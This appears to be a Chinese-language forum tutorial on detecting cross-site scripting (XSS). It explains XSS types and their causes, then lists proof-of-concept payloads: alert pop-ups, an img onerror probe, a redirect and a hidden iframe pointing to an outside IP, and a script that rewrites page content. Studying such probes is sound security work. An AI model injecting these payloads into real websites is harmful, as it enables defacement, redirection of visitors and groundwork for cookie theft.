XSS跨站脚本检测-WEB渗透社区-电脑端-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网

XSS跨站脚本检测

检测

  • 攻击WEB客户端

  • 客户端脚本语言

    • 弹窗告警、广告

    • Javascript

    • 在浏览器中执行

  • XSS(cross-site  scripting)

    • 通过WEB站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击目的

    • 注入客户端脚本代码

    • 盗取cookie

    • 重定向

  • VBScript , ActiveX, FLASH

 

 

JavaScritp

  • 与Java语言无关

  • 命名完全处于市场原因

  • 使用最广的客户端脚本语言

使用场景

直接嵌入html:<script>alert('XSS');</script>
元素标签事件:<body onload=alert('XSS')>
图片标签:<img src="javascript:alert('XSS');">
其他标签:<iframe>,<div>,<link>
DOM对象,篡改页面内容

漏洞形成的根源

  • 服务器对用户提交数据过滤不严

  • 提交给服务器的脚本被直接返回给其他客户端执行

  • 脚本在客户端执行恶意操作

 

XSS漏洞类型

  • 存储型(持久型)

  • 反射型(非持久)

  • DOM型

 

判断是否存在XSS漏洞,看看是否有返回值。

 

image

 

这样尝试在里面输入HTML代码也是可以被执行的

 

image

 

漏洞Poc

<script>alert('xss')</script>
#弹出警告窗口

 

image

 

#插入图片如果存在图片就弹窗
<img src=http://1.1.1.1/a.jpg onerror=alert('xss')>

#重定向
<script>window.location='http://1.1.1.1'</script>
<iframe SRC="http://1.1.1.1/sitemap" height ="0" width ="0"></iframe>

#插入NIU BI的HTML页面
<script>document.body.innerHTML="<div style=visibility:visible;><h1>NIU BI</h1></div>";</script>
请登录后发表评论

    没有回复内容